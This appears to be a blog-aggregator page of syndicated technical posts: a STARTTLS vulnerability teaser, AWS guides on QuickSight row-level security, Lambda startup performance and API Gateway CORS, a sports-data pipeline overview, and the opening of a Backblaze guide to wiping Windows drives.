[$] STARTTLS considered harmful

Post Syndicated from original https://lwn.net/Articles/866481/rss

The use of Transport
Layer Security
(TLS) encryption is ubiquitous on today’s internet,
though that has largely happened over the last 20 years or so; the first
public version of its predecessor, Secure Sockets Layer (SSL), appeared in
1995. Before then, internet protocols were generally not encrypted, thus providing
fertile ground for various types of “meddler-in-the-middle” (MitM) attacks.
Later on, the
STARTTLS command was added to some protocols as a
backward-compatible way to add TLS support, but the mechanism has suffered from a
number of flaws and vulnerabilities over the years. Some recent research,
going by the name “NO STARTTLS“, describes more, similar
vulnerabilities and concludes that it is probably time to avoid using
STARTTLS altogether.

Implement row-level security using a complete LDAP hierarchical organization structure in Amazon QuickSight

Post Syndicated from Anand Sakhare original https://aws.amazon.com/blogs/big-data/implement-row-level-security-using-a-complete-ldap-hierarchical-organization-structure-in-amazon-quicksight/

In a world where data security is a crucial concern, it’s very important to secure data even within an organization. Amazon QuickSight provides a sophisticated way of implementing data security by applying row-level security so you can restrict data access for visualizations.

An entire organization may need access to the same dashboard, but may also want to restrict access to the data within the dashboard per the organization’s hierarchical structure. For instance, vice presidents need visibility into all data within their organization, team managers need to see the data related to all their direct reports, and an individual contributor just needs to see the their own data. Creating and maintaining these data security rules can be laborious if managed manually.

In this post, we go into the details of how to extract the organizational hierarchical structure from Lightweight Directory Access Protocol (LDAP) data, flatten it, and create a row-level security permissions file to mimic the same level of hierarchical access controls to a QuickSight dataset. We show this with mock datasets of the LDAP data and ticketing data, and use that data to implement user-level access on QuickSight visualizations and datasets.

Overview of solution

In this post, we demonstrate processing LDAP data and implementing row-level security to control user-level access according to organizational hierarchies. We demonstrate with a sample dataset how to dynamically change the data behind visualizations. We also talk about automatically creating the permissions file required for implementing security on QuickSight visualizations using the LDAP data. Additionally, we create a sample dashboard and apply the generated permissions file to manage data access for the users.

LDAP hierarchical data (employee dataset)

We use sample LDAP data, which is a mock organizational hierarchical structure. Sample code to generate the hierarchical data is available on the GitHub repo.

The basic idea is we have a hierarchical dataset where an employee-manager or employee-supervisor relationship exists. In our sample dataset, we have employee_id and manager_id columns, which represent the employee-manager relationship. The following screenshot is the hierarchical representation of the first few employees in the dataset and the first few rows in the table. The data shows “Mies, Crin” (employee_id 0) is the root user. In our mock data, employee IDs range from 0–249, with 10 levels of hierarchies.

The following screenshot shows the hierarchical structure of the sample data.

Ticketing dataset

Our randomly generated sample ticketing dataset has about 250 tickets (see the following screenshot). Each of these tickets is assigned to an employee. The column assigned_to_emp_id represents the employee that the ticket is assigned to. The code to generate a random sample of the data is available on the GitHub repo.

We can replace emp_id with any unique identifier such as UID, RACF ID, email ID, and so on.

Sample organizational structure

The row-level security that we talk about in the next sections ties back to these two datasets. For example, tickets assigned to any employee ID present in the column assigned_to_emp_id should only be visible to the employees that are higher in that employee’s hierarchy. Tickets assigned to employee ID 18 can only be viewed by employee IDs 18, 7, 5, 1, and 0, because employee ID 18 directly or indirectly reports to them. The following screenshot shows an example of the hierarchy.

Preprocess ticketing data by flattening hierarchical relationships

We first need to flatten the LDAP data to get the employee IDs in the hierarchy in a row. This flattened data needs to be refreshed to account for any organizational changes, such as new employees onboarding. In this example, we use the SYS_CONNECT_BY_PATH function on an Amazon Relational Database Service (Amazon RDS) database to achieve that. We can achieve the same result programmatically or by using common table expressions (CTEs) in Amazon Redshift. The goal is to create 10 columns containing the complete path from that employee to the highest-level manager. Not every employee has a value in every column, assuming the employee isn’t at the lowest level of the hierarchy. A given employee ID appears on their own row, as well as rows for employees they’re a direct or indirect manager of. We query the data with the following code:

SELECT EMPLOYEE_ID, MANAGER_ID, "name", DOB, DEPT, SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/') "Path", 
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 1) "CEO",
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 2) "CEO_1",
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 3) "CEO_2",
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 4) "CEO_3",
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 5) "CEO_4",
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 6) "CEO_5",
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 7) "CEO_6",
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 8) "CEO_7",
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 9) "CEO_8",
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 10) "CEO_9",
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 11) "CEO_10"
FROM employees
START WITH MANAGER_ID is NULL
CONNECT BY PRIOR EMPLOYEE_ID = MANAGER_ID
ORDER BY EMPLOYEE_ID;

The following screenshot shows the query output.

The following screenshot shows an example of the hierarchy for employee ID 147.

For employee ID 147, we can see the employees in the hierarchy are organized in columns with their levels. Employee ID 147 reports to 142, 142 reports to 128, and so on. Similarly, for employee ID 142, we can see that the employees above 142 are present in their respective columns.

Join the ticketing data with the flattened LDAP data

To get to the final dataset that we need for visualizations, we need to join the ticketing data with the LDAP data with flattened hierarchies. For our demo, we created two tables, Tickets and Employees, and copied the data we showed earlier to these tables using an Amazon Redshift copy command from Amazon Simple Storage Service (Amazon S3). The following is a sample output of the join query between these tables. This dataset is what we import into SPICE in QuickSight. SPICE is QuickSight’s Super-fast, Parallel, In-memory Calculation Engine, and it’s engineered to rapidly perform advanced calculations and serve data.

select ticket_num,assigned_to_emp_id,name,category,manager_id,ceo,ceo_1,ceo_2,ceo_3,ceo_4,ceo_5,ceo_6,ceo_7,ceo_8,ceo_9,ceo_10  
from blogpostdb.Tickets a JOIN blogpostdb.Employees b
ON a.assigned_to_emp_id = b.EMPLOYEE_ID;

The following screenshot shows our flattened data.

Create the permissions file

You can use the following code snippet to create the permissions file needed to apply row-level security on your dataset in QuickSight:

import csv
def create_permissions_file(list_of_emp_ids, number_of_levels):
    output_header=["ceo_" + str(i) if i!=0 else 'ceo' for i in range(number_of_levels)]
    output_header.insert(0,'UserName')
    f=open("./sample_permissions_file.csv", 'w')
    writer = csv.writer(f)
    writer.writerow(output_header)
    for i in list_of_emp_ids:
        for j in range(1,len(output_header)):
            l = [None] * (len(output_header))
            l[j]=i
            l[0]=i
            print(l)
            writer.writerow(l)
    f.close()

The input to this function is a list of your employee IDs. These employee IDs appear as owners in the ticketing data as well. There are multiple ways to get the data. If the ticketing data ownership is related to any other user-specific information such as email ID or any unique identifier, then a list of that information is the input to this function. The second input is the number of levels your organization has (integer value). The goal is to create a CSV file to use as a permissions file for your dataset in QuickSight.

Assume there are 10 hierarchical levels in your organization. The output permissions file looks something like the following screenshot.

Create QuickSight analyses

We now apply the permission file to the QuickSight dataset. For instructions, see Using Row-Level Security (RLS) to Restrict Access to a Dataset.

Now we create a sample visualization to show the specific tickets owned by an employee or their reportees.

After we import the permissions file and apply it to the final dataset (created by joining the ticketing data with the flattened LDAP data) in SPICE, we’ve created the following visualization. The goal is to verify that when different users log in and see the visualization, they see the same visualization with different data, in this case the only tickets that concern them.

The following screenshot shows the visualization without any row-level security.

For our hierarchy, we’ve created QuickSight users with usernames that are the same as their employee IDs (the employee with ID 142 has the QuickSight username 142; this can easily be replaced by any unique identifiers your organization uses). We log in with employee IDs 232, 147, 61, 84, and 28, and verify that they only see the tickets that concern them. In the visualization “You are viewing tickets concerning these employees,” we can see whose tickets the logged-in user is authorized to see. Because the mocked data only consists of around 250 tickets randomly assigned to 250 employees, some visualizations may show no data.

The following screenshot shows the example hierarchy. Employee ID 232 is a leaf node (nobody reports to them).

Employee 232 is only authorized to view their own tickets, as shown in the following visualization.

Similarly, because employee ID 147 is also a leaf node, they can only view their assigned tickets.

In our example hierarchy, employee IDs 72, 75, 174, 229, and 134 report to employee 61. In our dataset, only four tickets are assigned to those employees. The following screenshot shows the tickets of concern to employee ID 61.

The following screenshot shows the visualizations visible to employee ID 61.

Similarly, when we log in with employee IDs 84 and 28, we can verify that they only see the tickets concerning them.

Publish the dashboard

You can use the share function to publish the analysis to a dashboard and share the data with stakeholders.

Clean up

To avoid incurring future charges, make sure to remove resources you created when you’re done using them.

Conclusion

Data security is an important concern for many organizations. This solution is an easy way to use organizational LDAP data to implement data security with row-level security in QuickSight. With organizational restructuring, hierarchies are bound to change with time. Therefore, the LDAP data can be dumped on a periodic basis and be updated in the respective Amazon Redshift table. This enables users to have better visibility in the data within their organizational hierarchy.


About the Author

Anand Sakhare is a Big Data Architect with AWS. He helps customers build big data, analytics, and machine learning capabilities using a mix of technologies. He is passionate about innovation and solving complex problems.

 

 

 

Rohan Jamadagni is a Sr. Data Architect, working with AWS for the past 5 years. He works closely with customers to implement data and analytics solutions on AWS. He enjoys understanding the meaning behind data and helping customers visualize their data to provide meaningful insights.

 

 

Umair Nawaz is a DevOps Engineer at Amazon Web Services in New York City. He works on building secure architectures and advises enterprises on agile software delivery. He is motivated to solve problems strategically by utilizing modern technologies.

Building well-architected serverless applications: Optimizing application performance – part 1

Post Syndicated from Julian Wood original https://aws.amazon.com/blogs/compute/building-well-architected-serverless-applications-optimizing-application-performance-part-1/

This series of blog posts uses the AWS Well-Architected Tool with the Serverless Lens to help customers build and operate applications using best practices. In each post, I address the serverless-specific questions identified by the Serverless Lens along with the recommended best practices. See the introduction post for a table of contents and explanation of the example application.

PERF 1. Optimizing your serverless application’s performance

Evaluate and optimize your serverless application’s performance based on access patterns, scaling mechanisms, and native integrations. This allows you to continuously gain more value per transaction. You can improve your overall experience and make more efficient use of the platform in terms of both value and resources.

Good practice: Measure and optimize function startup time

Evaluate your AWS Lambda function startup time for both performance and cost.

Take advantage of execution environment reuse to improve the performance of your function.

Lambda invokes your function in a secure and isolated runtime environment, and manages the resources required to run your function. When a function is first invoked, the Lambda service creates an instance of the function to process the event. This is called a cold start. After completion, the function remains available for a period of time to process subsequent events. These are called warm starts.

Lambda functions must contain a handler method in your code that processes events. During a cold start, Lambda runs the function initialization code, which is the code outside the handler, and then runs the handler code. During a warm start, Lambda runs the handler code.

Lambda function cold and warm starts

Lambda function cold and warm starts

Initialize SDK clients, objects, and database connections outside of the function handler so that they are started during the cold start process. These connections then remain during subsequent warm starts, which improves function performance and cost.

Lambda provides a writable local file system available at /tmp. This is local to each function but shared between subsequent invocations within the same execution environment. You can download and cache assets locally in the /tmp folder during the cold start. This data is then available locally by all subsequent warm start invocations, improving performance.

In the serverless airline example used in this series, the confirm booking Lambda function initializes a number of components during the cold start. These include the Lambda Powertools utilities and creating a session to the Amazon DynamoDB table BOOKING_TABLE_NAME.

import boto3
from aws_lambda_powertools import Logger, Metrics, Tracer
from aws_lambda_powertools.metrics import MetricUnit
from botocore.exceptions import ClientError

logger = Logger()
tracer = Tracer()
metrics = Metrics()

session = boto3.Session()
dynamodb = session.resource("dynamodb")
table_name = os.getenv("BOOKING_TABLE_NAME", "undefined")
table = dynamodb.Table(table_name)

Analyze and improve startup time

There are a number of steps you can take to measure and optimize Lambda function initialization time.

You can view the function cold start initialization time using Amazon CloudWatch Logs and AWS X-Ray. A log REPORT line for a cold start includes the Init Duration value. This is the time the initialization code takes to run before the handler.

CloudWatch Logs cold start report line

CloudWatch Logs cold start report line

When X-Ray tracing is enabled for a function, the trace includes the Initialization segment.

X-Ray trace cold start showing initialization segment

X-Ray trace cold start showing initialization segment

A subsequent warm start REPORT line does not include the Init Duration value, and is not present in the X-Ray trace:

CloudWatch Logs warm start report line

CloudWatch Logs warm start report line

X-Ray trace warm start without showing initialization segment

X-Ray trace warm start without showing initialization segment

CloudWatch Logs Insights allows you to search and analyze CloudWatch Logs data over multiple log groups. There are some useful searches to understand cold starts.

Understand cold start percentage over time:

filter @type = "REPORT"
| stats
  sum(strcontains(
    @message,
    "Init Duration"))
  / count(*)
  * 100
  as coldStartPercentage,
  avg(@duration)
  by bin(5m)
Cold start percentage over time

Cold start percentage over time

Cold start count and InitDuration:

filter @type="REPORT" 
| fields @memorySize / 1000000 as memorySize
| filter @message like /(?i)(Init Duration)/
| parse @message /^REPORT.*Init Duration: (?<initDuration>.*) ms.*/
| parse @log /^.*\/aws\/lambda\/(?<functionName>.*)/
| stats count() as coldStarts, median(initDuration) as avgInitDuration, max(initDuration) as maxInitDuration by functionName, memorySize
Cold start count and InitDuration

Cold start count and InitDuration

Once you have measured cold start performance, there are a number of ways to optimize startup time. For Python, you can use the PYTHONPROFILEIMPORTTIME=1 environment variable.

PYTHONPROFILEIMPORTTIME environment variable

PYTHONPROFILEIMPORTTIME environment variable

This shows how long each package import takes to help you understand how packages impact startup time.

Python import time

Python import time

Previously, for the AWS Node.js SDK, you enabled HTTP keep-alive in your code to maintain TCP connections. Enabling keep-alive allows you to avoid setting up a new TCP connection for every request. Since AWS SDK version 2.463.0, you can also set the Lambda function environment variable AWS_NODEJS_CONNECTION_REUSE_ENABLED=1 to make the SDK reuse connections by default.

You can configure Lambda’s provisioned concurrency feature to pre-initialize a requested number of execution environments. This runs the cold start initialization code so that they are prepared to respond immediately to your function’s invocations.

Use Amazon RDS Proxy to pool and share database connections to improve function performance. For additional options for using RDS with Lambda, see the AWS Serverless Hero blog post “How To: Manage RDS Connections from AWS Lambda Serverless Functions”.

Choose frameworks that load quickly on function initialization startup. For example, prefer simpler Java dependency injection frameworks like Dagger or Guice over more complex framework such as Spring. When using the AWS SDK for Java, there are some cold start performance optimization suggestions in the documentation. For further Java performance optimization tips, see the AWS re:Invent session, “Best practices for AWS Lambda and Java”.

To minimize deployment packages, choose lightweight web frameworks optimized for Lambda. For example, use MiddyJS, Lambda API JS, and Python Chalice over Node.js Express, Python Django or Flask.

If your function has many objects and connections, consider splitting the function into multiple, specialized functions. These are individually smaller and have less initialization code. I cover designing smaller, single purpose functions from a security perspective in “Managing application security boundaries – part 2”.

Minimize your deployment package size to only its runtime necessities

Smaller functions also allow you to separate functionality. Only import the libraries and dependencies that are necessary for your application processing. Use code bundling when you can to reduce the impact of file system lookup calls. This also includes deployment package size.

For example, if you only use Amazon DynamoDB in the AWS SDK, instead of importing the entire SDK, you can import an individual service. Compare the following three examples as shown in the Lambda Operator Guide:

// Instead of const AWS = require('aws-sdk'), use: +
const DynamoDB = require('aws-sdk/clients/dynamodb')

// Instead of const AWSXRay = require('aws-xray-sdk'), use: +
const AWSXRay = require('aws-xray-sdk-core')

// Instead of const AWS = AWSXRay.captureAWS(require('aws-sdk')), use: +
const dynamodb = new DynamoDB.DocumentClient() +
AWSXRay.captureAWSClient(dynamodb.service)

In testing, importing the DynamoDB library instead of the entire AWS SDK was 125 ms faster. Importing the X-Ray core library was 5 ms faster than the X-Ray SDK. Similarly, when wrapping a service initialization, preparing a DocumentClient before wrapping showed a 140-ms gain. Version 3 of the AWS SDK for JavaScript supports modular imports, which can further help reduce unused dependencies.

For additional options when for optimizing AWS Node.js SDK imports, see the AWS Serverless Hero blog post.

Conclusion

Evaluate and optimize your serverless application’s performance based on access patterns, scaling mechanisms, and native integrations. You can improve your overall experience and make more efficient use of the platform in terms of both value and resources.

In this post, I cover measuring and optimizing function startup time. I explain cold and warm starts and how to reuse the Lambda execution environment to improve performance. I show a number of ways to analyze and optimize the initialization startup time. I explain how only importing necessary libraries and dependencies increases application performance.

This well-architected question will be continued is part 2 where I look at designing your function to take advantage of concurrency via asynchronous and stream-based invocations. I cover measuring, evaluating, and selecting optimal capacity units.

For more serverless learning resources, visit Serverless Land.

Configuring CORS on Amazon API Gateway APIs

Post Syndicated from Eric Johnson original https://aws.amazon.com/blogs/compute/configuring-cors-on-amazon-api-gateway-apis/

Configuring cross-origin resource sharing (CORS) settings for a backend server is a typical challenge that developers face when building web applications. CORS is a layer of security enforced by modern browsers and is required when the client domain does not match the server domain. The complexity of CORS often leads developers to abandon it entirely by allowing all-access with the proverbial “*” permissions setting. However, CORS is an essential part of your application’s security posture and should be correctly configured.

This post explains how to configure CORS on Amazon API Gateway resources to enforce the least privileged access to an endpoint using the AWS Serverless Application Model (AWS SAM). I cover the notable CORS differences between REST APIs and HTTP APIs. Finally, I introduce you to the Amazon API Gateway CORS Configurator. This is a tool built by the AWS Serverless Developer Advocacy team to help you configure CORS settings properly.

Overview

CORS is a mechanism by which a server limits access through the use of headers. In requests that are not considered simple, the server relies on the browser to make a CORS preflight or OPTIONS request. A full request looks like this:

CORS request flow

CORS request flow

  1. Client application initiates a request
  2. Browser sends a preflight request
  3. Server sends a preflight response
  4. Browser sends the actual request
  5. Server sends the actual response
  6. Client receives the actual response

The preflight request verifies the requirements of the server by indicating the origin, method, and headers to come in the actual request.

OPTIONS preflight request

OPTIONS preflight request

The response from the server differs based on the backend you are using. Some servers respond with the allowed origin, methods, and headers for the endpoint.

OPTIONS preflight response

OPTIONS preflight response

Others only return CORS headers if the requested origin, method, and headers meet the requirements of the server. If the requirements are not met, then the response does not contain any CORS access control headers. The browser verifies the request’s origin, method, and headers against the data returned in the preflight response. If validation fails, the browser throws a CORS error and halts the request. If the validation is successful, the browser continues with the actual request.

Actual request

Actual request

The browser only sends the access-control-allow-origin header to verify the requesting origin during the actual request. The server then responds with the requested data.

Actual response

Actual response

This step is where many developers run into issues. Notice the endpoint of the actual request returns the access-control-allow-origin header. The browser once again verifies this before taking action.

Both the preflight and the actual response require CORS configuration, and it looks different depending on whether you select REST API or HTTP API.

Configuring API Gateway for CORS

While Amazon API Gateway offers several API endpoint types, this post focuses on REST API (v1) and HTTP API (v2). Both types create a representational state transfer (REST) endpoint that proxies an AWS Lambda function and other AWS services or third-party endpoints. Both types process preflight requests. However, there are differences in both the configuration, and the format of the integration response.

Terminology

Before walking through the configuration examples, it is important to understand some terminology:

  • Resource: A unique identifier for the API path (/customer/reports/{region}). Resources can have subresources that combine to make a unique path.
  • Method: the REST methods (for example, GET, POST, PUT, PATCH) the resource supports. The method is not part of the path but is passed through the headers.
  • Endpoint: A combination of resources and methods to create a unique API URL.

REST APIs

A popular use of API Gateway REST APIs is to proxy one or more Lambda functions to build a serverless backend. In this pattern, API Gateway does not modify the request or response payload. Therefore, REST API manages CORS through a combination of preflight configuration and a properly formed response from the Lambda function.

Preflight requests

Configuring CORS on REST APIs is generally configured in four lines of code with AWS SAM:

Cors:
  AllowMethods: "'GET, POST, OPTIONS'"
  AllowOrigin: "'http://localhost:3000'"
  AllowHeaders: "'Content-type, x-api-key'"

This code snippet creates a MOCK API resource that processes all preflight requests for that resource. This configuration is an example of the least privileged access to the server. It only allows GET, POST, and OPTIONS methods from a localhost endpoint on port 3000. Additionally, it only allows the Content-type and x-api-key CORS headers.

Notice that the preflight response only allows one origin to call this API. To enable multiple origins with REST APIs, use ‘*’ for the allow-control-allow-origin header. Alternatively, use a Lambda function integration instead of a MOCK integration to set the header dynamically based on the origin of the caller.

Authorization

When configuring CORS for REST APIs that require authentication, it is important to configure the preflight endpoint without authorization required. The preflight is generated by the browser and does not include the credentials by default. To remove the authorizer from the OPTIONS method add the AddDefaultAuthorizerToCorsPreflight: false setting to the authorization configuration.

Auth:
  AddDefaultAuthorizerToCorsPreflight: false
  Authorizers:
    MyCognitoAuth:
  
  …

Response

In REST APIs proxy configurations, CORS settings only apply to the OPTIONS endpoint and cover only the preflight check by the browser. The Lambda function backing the method must respond with the appropriate CORS information to handle CORS properly in the actual response. The following is an example of a proper response:

{
  "statusCode": 200,
  "headers": {
    "access-control-allow-origin":" http://localhost:3000",
  }
  "body": {"message": "hello world"}
}

In this response, the critical parts are the statusCode returned to the user as the response status and the access-control-allow-origin header required by the browser’s CORS validation.

HTTP APIs

Like REST APIs, Amazon API Gateway HTTP APIs are commonly used to proxy Lambda functions and are configured to handle preflight requests. However, unlike REST APIs, HTTP APIs handle CORS for the actual API response as well.

Preflight requests

The following example shows how to configure CORS on HTTP APIs with AWS SAM:

CorsConfiguration
  AllowMethods:
    - GET
    - POST
    - OPTIONS
  AllowOrigin:
    - http://localhost:3000
    - https://myproddomain.com
  AllowHeaders:
    - Content-type
    - x-api-key

This template configures HTTP APIs to manage CORS for the preflight requests and the actual requests. Note that the AllowOrigin section allows more than one domain. When the browser makes a request, HTTP APIs checks the list for the incoming origin. If it exists, HTTP APIs adds it to the access-control-allow-origin header in the response.

Authorization

When configuring CORS for HTTP APIs with authorization configured, HTTP APIs automatically configures the preflight endpoint without authorization required. The only caveat to this is the use of the $default route. When configuring a $default route, all methods and resources are handled by the default route and the integration behind it. This includes the preflight OPTIONS method.

There are two options to handle preflight. First, and recommended, is to break out the routes individually. Create a route specifically for each method and resource as needed. The second is to create an OPTIONS /{proxy+} method to override the $defaut route for preflight requests.

Response

Unlike REST APIs, by default, HTTP APIs modify the response for the actual request by adding the appropriate CORS headers based upon the CORS configuration. The following is an example of a simple response:

"hello world"

HTTP APIs then constructs the complete response with your data, status code, and any required CORS headers:

{
  "statusCode": 200,
  "headers": {
    "access-control-allow-origin":"[appropriate origin]",
  }
  "body": "hello world"
}

To set the status code manually, configure your response as follows:

{
  "statusCode": 201,
  "body": "hello world"
}

To manage the complete response like in REST APIs, set the payload format to version one. The payload format for HTTP API changes the structure of the payload sent to the Lambda function and the expected response from the Lambda function. By default, HTTP API uses version two, which includes the dynamic CORS settings. For more information, read how the payload version affects the response format in the documentation.

The Amazon API Gateway CORS Configurator

The AWS serverless developer advocacy team built the Amazon API Gateway CORS Configurator to help you configure CORS for your serverless applications.

Amazon API Gateway CORS Configurator

Amazon API Gateway CORS Configurator

Start by entering the information on the left. The CORS Configurator builds the proper snippets to add the CORS settings to your AWS SAM template as you add more information. The utility demonstrates adding the configuration to all APIs in the template by using the Globals section. You can also add to an API’s specific resource to affect only that API.

Additionally, the CORS Configurator constructs an example response based on the API type you are using.

This utility is currently in preview, and we welcome your feedback on how we can improve it. Feel free to open an issue on GitHub at https://github.com/aws-samples/amazon-api-gateway-cors-configurator.

Conclusion

CORS can be challenging. For API Gateway, CORS configuration is the number one question developers ask. In this post, I give an overview of CORS with a link to an in-depth explanation. I then show how to configure API Gateway to create the least privileged access to your server using CORS. I also discuss the differences in how REST APIs and HTTP APIs handle CORS. Finally, I introduced you to the API Gateway CORS Configurator to help you configure CORS using AWS SAM.

I hope to provide you with enough information that you can avoid opening up your servers with the “*” setting for CORS. Take the time to understand your application and limit requests to only methods you support and from only originating hosts you intended.

For more serverless content, go to Serverless Land.

Building a Data Pipeline for Tracking Sporting Events Using AWS Services

Post Syndicated from Ashwini Rudra original https://aws.amazon.com/blogs/architecture/building-a-data-pipeline-for-tracking-sporting-events-using-aws-services/

In an evolving world that is increasingly connected, data-centric, and fast-paced, the sports industry is no exception. Amazon Web Services (AWS) has been helping customers in the sports industry gain real-time insights through analytics. You can re-invent and reimagine the fan experience by tracking sports actions and activities. In this blog post, we will highlight common architectural and design patterns for building a data pipeline to track sporting events in real time.

The sports industry is largely comprised of two subsegments: participatory and spectator sports. Participatory sports, for example fitness, golf, boating, and skiing, comprise the largest share of the market. Spectator sports, such as teams/clubs/leagues, individual sports, and racing, are expected to be the fastest growing segment. Sports teams/leagues/clubs comprise the largest share of the Spectator sports segment, and is growing most rapidly.

IoT data pipeline architecture overview

Let’s discuss the infrastructure in three parts:

  1. Infrastructure at the arena itself
  2. Processing data using AWS services
  3. Leveraging this analysis using a graphics overlay (this can be especially useful for broadcasters, OTT channels, and arena users)

Data-gathering devices

Radio-frequency identification (RFID) chips or IoT devices can be worn by players or embedded in the playing equipment. These devices emit 20–50 messages per second. These messages are collected and output using JSON. This information may include player coordinate positions, player speed, statistics, health information, or more. To process the game, leagues, coaches, or broadcasters can analyze this data using analytics tools and/or machine learning.

Figure 1. Data pipeline architecture using AWS Services

Figure 1. Data pipeline architecture using AWS Services

Processing data, feature engineering, and model training at AWS

Use serverless services from AWS when possible in order to keep your solution scalable and cost-efficient. This also helps with operational overhead for teams. You can use the Kinesis family of services for stream ingestion and processing. The streaming data from hundreds to thousands of IoT sources (from equipment and clothing) can be fed to Amazon Kinesis Data Streams (KDS). KDS and Amazon Kinesis Data Firehose provide a buffering mechanism for streaming data before it lands on Amazon Simple Storage Service (S3). With Amazon Kinesis Data Analytics, you can process and analyze Kinesis stream data using powerful SQL, Apache Flink, or Beam. Kinesis Data Analytics also supports building applications in SQL, Java, Scala, and Python. With this service, you can quickly author and run powerful SQL code against Amazon Kinesis Streams as your source. This way you can perform time series analytics, feed real-time dashboards, and create real-time metrics. Read more about Amazon Kinesis Data Analytics for SQL Applications.

You might want to transform or enhance the streaming data before it is delivered to Amazon S3. Amazon Kinesis Data Firehose can be used with an AWS Lambda function to do the transformation. Let’s say you have a player prediction timestamp that you want to represent in a different time format to different ML algorithms. Lambda can process and transform this data. Kinesis Data Firehose will deliver the transformed and raw data to the destination (Amazon S3). This can occur after the specific buffering size or when the buffering interval is reached, whichever happens first.

For more complex transformations, AWS Glue can be used. For example, once the data lands in Amazon S3, you can start preparing and aggregating the training dataset using Amazon SageMaker Data Wrangler. As part of the feature engineering process, you can do the following:

  • Transform the data
  • Delete unneeded columns
  • Impute missing values
  • Perform label encoding
  • Use the quick model option to get a sense of which features are adding predictive power as you progress with your data preparation

All the data preparation and feature engineering tasks can be performed from Data Wrangler’s single visual interface.

Once data is prepared in Amazon S3, Amazon SageMaker can be used for model training. In soccer, you can predict a goal percentage based on the player’s position, acceleration, and past performance history.  SageMaker provides several built-in algorithms that can be trained. For real-time predictions, Amazon API Gateway provides an API layer to clients like an OTT, broadcasting service, or a web browser. API Gateway can invoke a Lambda function, with logic to call a SageMaker endpoint and persist the output to the database. This data can be used later on for further analysis or to fine-tune your models.

Figure 2. Deliver real-time prediction using SageMaker

Figure 2. Deliver real-time prediction using Amazon SageMaker

Computer vision-based object detection techniques can be very useful in Sports. These techniques use deep learning algorithms to predict the pass probability, game player face-off, or win prediction. For the sports industry, object detection technology like these are crucial. They obviate the need for sensors. Real-time object identification can be used to:

  • Generate new advanced analytics regarding player and team performance
  • Aid game officials in making correct calls
  • Provide fans an improved and more data-rich viewing experience

Read Football tracking in the NFL with Amazon SageMaker for more information on how to track using broadcast video data. Using SageMaker, you can train object detection models that analyze thousands of images. You can then locate and classify the football itself, and distinguish it from background objects.

Creating a graphics overlay

When you have the ML inference data and video ingestion ready, you may want to represent this data on your broadcasted video. The graphic overlay feature lets you insert an image (a BMP, PNG, or TGA file) at a specified time. It is displayed as a static overlay on the underlying video for a specified duration. The motion graphic overlay feature lets you insert an animation (a MOV or SWF file, or a series of PNG files) on the underlying video. This can be displayed at a specified time for a specified duration.

For example, a player’s motion prediction can be inserted on video during a game, through a RESTful API call of ML inferences. You can use AWS Elemental Live to achieve this. Read about AWS Elemental Live Graphic Overlay at AWS documentation.

Reducing latency

You may want to reduce latency for analytics such as for player health and safety. Use video, data, or machine learning processing at the arena using AWS Outposts. You can also use AWS Wavelength along with 5G infrastructure. For more information, read Catch Important Moments in Sports with 5G and AWS Wavelength.

Summary

In this blog, we’ve highlighted how customers in the sports industry are using AWS to increase the quality of the game, and enhance the sports fan’s experience. The following benefits can be achieved by building a data pipeline for tracking sporting events using AWS services:

  • Amazon Kinesis collects, processes, and analyzes in-game streaming data in real time. This way both teams and fans get timely insights and can react quickly to new information.
  • The serverless nature of this architecture enables a cost-effective, scalable, and operationally efficient environment for customers.
  • Amazon Machine Learning services like Amazon SageMaker can be used to enrich the fan viewing experience. It presents in-game predictions such as who will score next, or which team will win the game.

Visit our AWS Sports Partnerships page for more information on how AWS is changing the game.

Getting Rid of Your PC? Here’s How to Wipe a Windows SSD or Hard Drive

Post Syndicated from Molly Clancy original https://www.backblaze.com/blog/how-to-wipe-pc-ssd-or-hard-drive/

Securely Erasing PC Drives

Are you hanging on to an old PC because you don’t know how to scrub the hard drive clean of all your personal information? Worried there’s data lurking around in there even after you empty the recycle bin? (Yes, there is.)

You always have the option of taking a baseball bat to the thing. Truly, physical destruction is one way to go (more on that later). But, there are much easier and more reliable, if less satisfying, ways to make sure your Windows PC is as clean as the day it left the factory.

First Things First: Back Up

Before you break out the Louisville Slugger (or follow our simple steps below), make sure your data is backed up as part of a 3-2-1 backup strategy where you keep three copies of your data on two types of media with one off-site. Your first copy is the one on your computer. Your second copy can be kept on an external hard drive or other external media. And the third copy should be kept in an off-site location like the cloud. If you’re not backing up an off-site copy, now is a great time to get started.

Windows 7, 8, 8.1, 10, and 11 all have basic utilities you can use to create a local backup on an external hard drive that you can use to move your files to a new computer or just to have a local backup for safekeeping. Once you’re backed up, you’re ready to wipe your PC’s internal hard drive.

How to Completely Wipe a PC

First, you’ll need to figure out if your Windows PC has a hard disk drive (HDD) or solid state drive (SSD). Most desktops and laptops sold in the last few years will have an SSD, but you can easily find out to be sure:

  1. Open Settings.
  2. Type “Defragment” in the search bar.
  3. Click on “Defragment and Optimize Your Drives.”
  4. Check the media type of your drive.

screenshot for selecting drive to wipe clean

How to Erase Your Windows Drive

Now that you know what kind of drive you have, there are two options for wiping your PC:

  1. Reset: In most cases, wiping a PC is as simple as reformatting the disk and reinstalling Windows using the Reset function. If you’re just recycling, donating, or selling your PC, the Reset function makes it acceptably difficult for someone to recover your data, especially if it’s also encrypted. This can be done easily in Windows versions 8, 8.1, 10, and 11 for either an HDD or an SSD.
